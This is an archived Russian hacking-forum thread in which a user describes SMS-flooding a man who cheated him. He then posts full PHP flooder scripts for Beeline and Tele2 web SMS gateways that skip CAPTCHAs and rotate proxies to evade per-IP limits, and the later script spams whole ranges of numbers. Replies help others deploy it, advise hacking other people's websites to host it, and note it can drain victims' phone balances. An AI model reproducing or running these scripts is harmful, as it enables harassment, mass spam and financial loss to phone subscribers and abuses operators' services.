PDA

Просмотр полной версии : Как я зафлудил билайн


sb2k
10.10.2006, 10:41
Однажды мой знакомый киданул меня на 300$. Я довольно не плохо знал этого человека. Знал его имя, город в котором он живёт и номер его мобильника. Конечно ехать и убивать его за 9 тысячь рублей я не стал =) Но зато решил поглумиться и зафлудить его мобилу смсками. Все наверное знают, что с сайтов операторов можно отправлять смс сообщения - этим я и решил воспользоваться. Через минуту я узнал, что оператор кидалы довольно популярный билайн, который я и сам юзаю =). Потопал я на сайт билайна и нашел там форму отправки смс. И тут облом. Картинка защиты. Обойти методом подмены её не получилось, а о расспознание я и не думал, уж очень навороченая картинка для меня. Тогда я начал тупо ходить по сайту билайна, с каждой секундой всё сильнее признавая своё поражение. Тут я наткнулся на прогу, с помощью, которой как увиряют разработчики можно отсылать смс сообщения прямо с домашнего компьютера. Интересно, надо скачать подумал я. Скачал-поставил. Ага, работает. Ну и?! И тут я вдруг понял, что в этой программе нет никаких картинок защиты, в отличие от формы на сайте. Ну и раз программа отправляет смс сообщения без ввода кодов на картинке защиты значет и я могу. Я проснифил весь исходящий трафик от этой проги netsnifer'ом и увидел обычные http запросы. Через минуту был написан простенкий скрипт для флуда моего недруга. А еще через мгновение его телефон был закидан тысячями сообщений. Такая вот веселая история, не дай Бог никому =).
Ах да, сам код флудера. Чуть не забыл =)

INDEX.HTML :

<html>
<center>
<form name="tele2" action="send.php" method="POST">
<h3>Phone</h3><br>
<input name="phone" value="" type="text" size="14" maxlength="12"><br>
<h3>Count of messages</h3><br>
<input name="count" value="10" type="text" size="14" maxlength="12"><br>
<h3>Message text</h3><br>
<textarea name="message" rows="5" cols="40"></textarea><br>
<input name="submit" type="submit" value="Start spam">
</center>
</html>

<?
ini_set("error_log",'errors.txt');
ini_set("log_errors",'1');

echo '<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">';
set_time_limit(0);
$log=fopen("log.txt","w+");
$proxy="";
$proxycount=0;
$proxyf=file("proxy.txt");

function setproxy(){
global $proxy;
global $proxycount;
global $proxyf;
if (count($proxyf)==0) die;
if ($proxycount==count($proxyf))
{
{$proxy=$proxyf[0];$proxycount=0;exit;}
}
$proxy=trim($proxyf[$proxycount]);
$proxycount=$proxycount+1;
printandlog("Set proxy - ".$proxy);
}

function printandlog($text){
global $log;
fputs($log,$text."\r\n");
echo $text.'<br>';
flush();
}

function send($num,$message){
global $proxy;
//$message=urlencode($message);
$cr=curl_init("http://www.beonline.ru/servlet/send/sms/");
curl_setopt($cr, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
curl_setopt($cr, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($cr, CURLOPT_TIMEOUT, 20);
curl_setopt($cr, CURLOPT_HEADER, 1);
curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");
curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cr, CURLOPT_REFERER, "http://BeeOnLine-Express");
curl_setopt($cr,CURLOPT_PROXY,$proxy);
$r = curl_exec($cr);
if (curl_error($cr))
{
return 'connection_error';
curl_close($cr);
exit;
}
curl_close($cr);
echo $r;
if (StrPos($r,"с данного IP-адреса")<>false) return "notsend";else
return "send";
}

if (!isset($_POST["phone"])) die;
if (!isset($_POST["count"])) die;
if (!isset($_POST["message"])) die;
printandlog("Spam start");
printandlog("Found ".count($proxyf)." proxy");
for ($i=1;$i<=$_POST["count"];$i++)
{
while(1==1)
{
$tem=send(trim($_POST["phone"]),$message);
if ($tem<>"send") setproxy(); else break;
}
printandlog($i." - Send");
}
printandlog("All message send ok");
?>

Кому надо разберётся, что тут да как ;)

-FARAON2005RAMSES-
10.10.2006, 14:11
Чувак, а как насчёт того что там такая хрень - типа всего 12 СМС с одного IP в день!
Ты что и это тоже обошёл? Ты не гонишь? У меня на сайте такая форма есть http://faraon2005ramses.narod.ru/sms.html
Это та же система как на сайте билайна, только без всяких "введите число на картинке"
Что на это скажешь?

sb2k
10.10.2006, 14:16
Глянул на твою форму :
"Внимание!!! Количество отправляемых сообщений с одного Ip-адреса в сутки ограничено.". В моём примере юзаются прокси и это тоже обходится...

cardons
16.10.2006, 14:35
Кто нить поставил себе? Если да то дайде пожалуйста ссылку.

DRON-ANARCHY
16.10.2006, 16:15
ага. чтоб ты запользовал, а чела потом завалили?
тебе дали код-пользуй

====

ps подпись у тебя лажовая

cardons
16.10.2006, 17:33
Вот моя ссылка тока че-то это фигня нифига непашет.
у меня 8000 прокси.

cardons
24.10.2006, 18:32
Может кто нить скажет почему непашет?

Talisman
24.10.2006, 19:02
на бесплатном ХОЛМовском хостинге (h**) залочены внешние запросы в пшп - вот скрипт и не пашет

И.Г.
24.10.2006, 19:34
Юзай мозги и платный хостинг.... У меня работает (с доработкой небольшой)

cardons
18.11.2006, 00:39
Я непойму в каком формате туда вбивать номер для отправки.

_Great_
18.11.2006, 00:54
79031234567

cardons
18.11.2006, 00:56
Странно я у себя поместил.Но нифига неприсылаеться.

_Great_
18.11.2006, 01:03
Попробуй просто такую форму заполни:

<center>
<h2>BeeLine SMS Send</h2>
<form action='http://www.beonline.ru/servlet/send/sms/' method='post'>
Phone: <small>(in format 79031234567)</small> <input type='text' maxlength=11 name='phone' /><br />
<input type='hidden' name='number_sms' value='number_sms_send' />
<input type='hidden' name='prf' value='7909' />
<input type='hidden' name='termtype' value='G' />
<textarea name='message' rows=10 cols=55></textarea><br />
<input type='hidden' name='translit' value='' />
<input type='hidden' name='x' value='5' />
<input type='hidden' name='y' value='4' />
<input type='submit' value='Send' />
</form>
</center>

Мне пришло

cardons
18.11.2006, 01:15
Да эту форму я знаю.Мне надо чтобы для массофого флуда а не для того чтобы 1 сообщение приходило.

_Great_
18.11.2006, 01:16
Ну это ясно.
я просто для проверки предложил

cardons
18.11.2006, 03:21
Не проверка это ясно, но мне надо для флуда.

cardons
18.11.2006, 13:18
Странно у меня нифига неотсылает.

cardons
24.11.2006, 18:47
Да пробовал пишет что отправил а сам нече неотправляет.

dinar_007
24.11.2006, 20:02
А инет крэком получится флудить? (:

Кэйн
26.11.2006, 03:34
Я вот сюда залил
http://www.kein2006.jino-net.ru/blank.html
Счас проверять буду :)

kyzmi4
26.11.2006, 04:16
Я вот сюда залил
http://www.kein2006.jino-net.ru/blank.html
Счас проверять буду :)
Ну и как? Удачна =)

Кэйн
27.11.2006, 01:46
Нет. Но это видимо потому что хостинг бесплатный....
На нем даже майл бомбер не работает...

cheet
27.11.2006, 01:57
Да все прекрасно работает и не надо говрить что у кого то не пашет. А на бесплатном хостинге вообще размещать не надо. Ломаете какои нить сайт заливаете все это добро туда и спамите пока вас не спалят. И проверяите прокси на работоспособность перед тем как в proxy.txt записыват.

А®ТеS
30.11.2006, 15:16
Гыг... сайты ломать нехорошо =))).. а спамить тем более

Anti_Woody
02.12.2006, 05:36
А что это за номер такой 7909 ??? ;)

curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");


Вообщем этот скрипт просто напросто отправляет смс на платный номер, указывая свой номер для проверки скрипта вы рискуете остаться без лаве!, но можно и жертву обнулить! :)

kyzmi4
02.12.2006, 06:03
А что это за номер такой 7909 ??? ;)

curl_setopt($cr, CURLOPT_POSTFIELDS, "phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");


Вообщем этот скрипт просто напросто отправляет смс на платный номер, указывая свой номер для проверки скрипта вы рискуете остаться без лаве!, но можно и жертву обнулить! :)
:( Ты его хоть устанавливал? запускал?

Anti_Woody
02.12.2006, 06:33
:( Ты его хоть устанавливал? запускал?

Попробовал не глядя, хорошо что php на этом серванте не работал, !
а вот мой знакомый лишился 70р. (удружил так сказать:) )


а вот что мне ответил рамблер: Отсылка с смс странички оператора.
7904*@sms.dti.ru , 7902*@sms.dti.ru ,
7909*@sms.beemail.ru где вместо*** указываем номер абонента идущий после кода.

ZanozA
17.01.2007, 01:55
а у кого нить есть список proxy хороший!напишите плз в приват!=))

~acID~
17.01.2007, 23:03
Мдя)). Как все сложно. В свое время мы флудили смсами абонентов сотовых прямо с трубы, через моб.тырнет))) сразу по 1000 штук отсылали))
Одно жаль, что мобилу у меня украли, а вап-адрес этого смс-оправителя я, естесстно, по закону бутерброда, не запомнила (((...
Если кто вдруг знает ( и там все до сих пор работает, а было это 2-3 года назад) - киньте линк в личку.

~acID~
17.01.2007, 23:05
ZanozA, юзай гугл или яндекс.
или скачай Прокси-Свитчер (Proxy Switcher) - а поможет тебе поиск на этом сайте =)

gizmo
17.01.2007, 23:08
ZanozA, юзай гугл или яндекс.
или скачай Прокси-Свитчер (Proxy Switcher) - а поможет тебе поиск на этом сайте =)
нет еще паблик кряка для этой проги.
версия 3.8.2 пашет только.

Sinex
03.02.2007, 19:07
У тех кого не работает, а вы https прокси пользуетесь? У меня только с ними все Ок, советую//Отличный скрипт

Fritz
03.02.2007, 21:06
скиньте кому не жалко список анонимных проксей в личку примного буду благодарен...

Fritz
04.02.2007, 21:44
а у меня вот что пишет......
Fatal error: Call to undefined function: curl_init() in /home/********/send.php on line 36

insurgent
09.02.2007, 16:02
А как добавить, что в заданное время отправлял смс? Например, в 7:00:00, 7:00:10, 8:10:20 и т д

Darkweider
10.02.2007, 00:16
Даже если этот способ и работает мне кажется багу профиксили... Считаю тему закрытой)

А®ТеS
10.02.2007, 01:37
А как добавить, что в заданное время отправлял смс? Например, в 7:00:00, 7:00:10, 8:10:20 и т д
Если есть доступ к крону (cron) в никсах то мона туда добавить запуск скрипта в нужнок время. Или планировщиком задач в винде.

NewHacker
21.04.2007, 11:28
Спасибо автору за скрипт. ОН РАБОТАЕТ.
Но у меня появился вопрос: как отключить перевод в транслит.

zerokill
22.04.2007, 01:06
Автору респект , я тоже хотел зделать что то подобное ,ещё с кликателем .Но есть одна бага в том что чел може отключить услугу принимать смс и ммс с сети (((( . Сам раньше не знал . Ну соответственно изначально она включенна по умолчанию.
АВтору +

sb2k
23.04.2007, 17:35
Привет усем =)
Судя по количеству просмотров и ответов данная тема многим не безразлична, в связи с этим решил выложить исходники спамилки для оператора теле 2.

index.html
<html>
<center>
<form name="tele2" action="send.php" method="POST">
<h3>Prefix</h3><br>
<input name="prefix" value="7904" type="text"><br>
<h3>From num</h3><br>
<input name="from" value="5110000" type="text" size="14" maxlength="7"><br>
<h3>To num</h3><br>
<input name="to" value="5919999" type="text" size="14" maxlength="7"><br>
<h3>Message text</h3><br>
<textarea name="message" rows="5" cols="40"></textarea><br>
<input name="submit" type="submit" value="Start spam">
</center>
</html>

send.php
<?
ini_set("error_log",'errors.txt');
ini_set("log_errors",'1');
set_time_limit(0);
$log=fopen("log.txt","w+");
$proxy="";
$proxycount=0;
$proxyf=file("proxy.txt");

function setproxy(){
global $proxy;
global $proxycount;
global $proxyf;

if ($proxycount==count($proxyf))
{
{$proxy=$proxyf[0];$proxycount=0;exit;}
}
$proxy=trim($proxyf[$proxycount]);
$proxycount=$proxycount+1;
printandlog("Set proxy - ".$proxy);
}

function printandlog($text){
global $log;
fputs($log,$text."\r\n");
echo $text.'<br>';
flush();
}

function send($prefix,$phone,$message){
global $proxy;
$message=urlencode($message);
$cr=curl_init("http://www.rocc.ru/cgi-bin/sms33.cgi");
curl_setopt($cr, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
curl_setopt($cr, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($cr, CURLOPT_TIMEOUT, 30);
curl_setopt($cr, CURLOPT_HEADER, 1);
curl_setopt($cr, CURLOPT_POSTFIELDS, "Prefix=".$prefix."&phone=".$phone."&message=".$message."&remainchars=160");
curl_setopt($cr,CURLOPT_PROXY,$proxy);
curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($cr);
if (curl_error($cr))
{
return 'connection_error';
curl_close($cr);
exit;
}
curl_close($cr);
// echo $r;
//Сообщение принято к отправке.
if (StrPos($r,"принято к отправке")==true) return "send"; else return "notsend";
}

if (!isset($_POST["from"])) die;
if (!isset($_POST["to"])) die;
if (!isset($_POST["message"])) die;
if (!isset($_POST["prefix"])) die;

printandlog("Spam start");
printandlog("Found ".count($proxyf)." proxy");
for ($i=$from;$i<=$to;$i++)
{
setproxy();
while(1==1)
{
$tem=send($prefix,$i,$message);
if ($tem<>"send") setproxy(); else break;
}
printandlog($i." - Send");
}
printandlog("All message send ok");
?>

Пользуйте ;)

NewHacker
26.04.2007, 09:44
Спасибо. Для полного счастья сделали бы ещё на МТС, Мегафон, Utel

sb2k
28.04.2007, 16:50
Будет время - напишу ;)

4xks
21.05.2007, 00:36
давай еще для украинского Билайна - http://beeline.ua

NewHacker
22.09.2007, 17:51
Нашел как отрубить транслит:

НАДО ИСПРАВИТЬ ЭТО:
"phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=&x=5&y=4");

НА ЭТО:
"phone=".$num."&number_sms=number_sms_send&prf=7909&termtype=G&message=".$message."&translit=1");

GenaD
14.01.2008, 19:43
http://sms.contact.dn.ua/ юзайте !